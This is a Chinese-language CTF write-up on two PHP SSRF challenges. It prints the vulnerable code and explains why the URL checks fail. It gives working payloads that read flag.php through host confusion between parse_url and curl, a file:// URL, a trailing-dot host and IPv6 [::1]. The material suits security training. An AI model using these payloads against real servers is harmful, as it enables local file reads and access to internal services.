第一道题来自2018 上海市大学生网络安全大赛线上赛web01
if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.baidu.com') { var_dump(parse_url($_POST['url'])['host']); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $_POST['url']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($curl); echo $content; curl_close($curl); $filename='download/'.rand().';img1.jpg'; file_put_contents($filename,$content); echo $_POST['url']; $img="<img src="".$filename.""/>"; echo $img; } else { echo "you need post url: http://www.ichunqiu.com"; }
对协议没有限制,可以用file协议
payload:
url=file://@127.0.0.1:80@www.ichunqiu.com/./..//var/www/html/flag.php
parse_url 取出的Host是www.ichunqiu.com绕过了if判断
curl解析的时候host则是127.0.0.1,通过file协议读取flag
另一道题与这个类似,只不过通过http协议读取flag
index.php
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?://.*(/)?.*$/',$url); if (!$match_result){ die('url fomat error1'); } try{ $url_parse=parse_url($url); // var_dump($url); } catch(Exception $e){ die('url fomat error2'); } $hostname=$url_parse['host']; $ip=gethostbyname($hostname); $int_ip=ip2long($ip); return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16 || ip2long('0.0.0.0')>>24 == $int_ip>>24; } function safe_request_url($url) { if (check_inner_ip($url)){ echo $url.' is inner ip'; } else{ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); $result_info = curl_getinfo($ch); if ($result_info['redirect_url']){ safe_request_url($result_info['redirect_url']); } curl_close($ch); var_dump($output); } } $url = $_GET['url']; if(!empty($url)){ safe_request_url($url); } else{ highlight_file(__file__); } //flag in flag.php ?>
flag.php
<?php if (! function_exists('real_ip') ) { function real_ip() { $ip = $_SERVER['REMOTE_ADDR']; if (is_null($ip) && isset($_SERVER['HTTP_X_FORWARDED_FOR']) && preg_match_all('#d{1,3}.d{1,3}.d{1,3}.d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) { foreach ($matches[0] AS $xip) { if (!preg_match('#^(10|172.16|192.168).#', $xip)) { $ip = $xip; break; } } } elseif (is_null($ip) && isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (is_null($ip) && isset($_SERVER['HTTP_CF_CONNECTING_IP']) && preg_match('/^([0-9]{1,3}.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CF_CONNECTING_IP'])) { $ip = $_SERVER['HTTP_CF_CONNECTING_IP']; } elseif (is_null($ip) && isset($_SERVER['HTTP_X_REAL_IP']) && preg_match('/^([0-9]{1,3}.){3}[0-9]{1,3}$/', $_SERVER['HTTP_X_REAL_IP'])) { $ip = $_SERVER['HTTP_X_REAL_IP']; } return $ip; } } $rip = real_ip(); if($rip === "127.0.0.1") die("HRCTF{SSRF_can_give_you_flag}"); else die("You IP is {$rip} not 127.0.0.1"); ?>
payload1:http://121.195.170.191/ctf/day16/index.php?url=http://@127.0.0.1:80@www.freebuf.com/ctf/day16/flag.php
payload2:http://121.195.170.191/ctf/day16/index.php?url=http://127.0.0.1./ctf/day16/flag.php
ip2long('0.0.0.0')>>24 == $int_ip>>24;也得注释掉,127.0.0.1.gethostbyname解析不了,$int_ip为false,真好和ip2long('0.0.0.0')得到的结果相同了。
paload3:通过ipv6绕过,http://[::1]/
gethostbyname不能解析ipv6地址,$int_ip为false。ip2long('0.0.0.0')>>24 == $int_ip>>24;注释掉这个语句就能绕过检查。
$hostname=$url_parse['host']; $ip=gethostbyname($hostname); var_dump($ip); //[::1] $int_ip=ip2long($ip); var_dump($int_ip); //返回false // var_dump($int_ip); // var_dump(ip2long('0.0.0.0')); // return 0; return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16 ;//|| ip2long('0.0.0.0')>>24 == $int_ip>>24;
参考链接:
http://skysec.top/2018/03/15/Some%20trick%20in%20ssrf%20and%20unserialize()/
https://xz.aliyun.com/t/3178#toc-0
https://xz.aliyun.com/t/3150